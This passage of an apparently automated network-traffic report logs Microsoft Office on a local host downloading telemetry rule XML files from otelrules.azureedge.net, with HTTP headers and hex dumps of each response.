                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:24 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:23 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1368
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                            ETag: "0x8DC582BDDC22447"
                                                                                                                            x-ms-request-id: 8d8a3cd7-301e-001f-2922-41aa3a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073123Z-174f784596886s2bhC1EWR743w0000000zkg000000008vs1
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:24 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            111192.168.2.54983313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:23 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:24 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:24 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1401
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                            ETag: "0x8DC582BE055B528"
                                                                                                                            x-ms-request-id: f1905457-c01e-0066-4580-3fa1ec000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073124Z-174f7845968pf68xhC1EWRr4h80000000zwg000000003pk3
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:24 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            112192.168.2.54983413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:25 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:25 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1364
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                            ETag: "0x8DC582BE1223606"
                                                                                                                            x-ms-request-id: 2ff5ce10-101e-0017-5791-3f47c7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073125Z-174f7845968qj8jrhC1EWRh41s0000000zeg00000000b6hk
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:25 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            113192.168.2.54983513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:25 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:26 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:25 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1397
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                            ETag: "0x8DC582BE7262739"
                                                                                                                            x-ms-request-id: 931d4756-e01e-001f-0f26-401633000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073125Z-174f78459685726chC1EWRsnbg0000000zmg0000000080y4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:26 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            114192.168.2.54983613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:25 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:26 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1360
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                            x-ms-request-id: bec1df9e-001e-005a-2515-41c3d0000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073126Z-174f7845968frfdmhC1EWRxxbw0000000zmg000000007sy7
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:26 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            115192.168.2.54983713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:25 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:26 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1403
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                            ETag: "0x8DC582BDCB4853F"
                                                                                                                            x-ms-request-id: 580008bf-301e-0000-1d8a-3feecc000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073126Z-174f78459684bddphC1EWRbht40000000zf00000000000sf
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:26 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            116192.168.2.54983813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:26 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:26 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:26 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1366
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                            x-ms-request-id: f4671ffc-301e-0000-793a-40eecc000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073126Z-174f7845968swgbqhC1EWRmnb40000000zsg000000005kgq
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:26 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            117192.168.2.54983913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:27 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:27 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:27 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1397
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                            x-ms-request-id: 3a99e642-c01e-0049-2bdd-41ac27000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073127Z-174f7845968px8v7hC1EWR08ng0000000zyg000000001a5x
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:27 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            118192.168.2.54984013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:27 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:28 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1360
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                            x-ms-request-id: a0e0d5c5-a01e-0084-68de-419ccd000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073128Z-174f7845968n2hr8hC1EWR9cag0000000zb00000000017z0
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:28 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            119192.168.2.54984113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:27 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:28 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1427
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                            x-ms-request-id: 417f12c6-b01e-003e-571e-428e41000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073128Z-174f7845968px8v7hC1EWR08ng0000000zzg0000000004w9
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:28 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            120192.168.2.54984213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:28 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:28 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:28 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1390
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                            x-ms-request-id: 951aba40-201e-0085-5291-3f34e3000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073128Z-174f7845968xr5c2hC1EWRd0hn0000000gc0000000009sge
                                                                                                                            x-fd-int-roxy-purgeid: 0
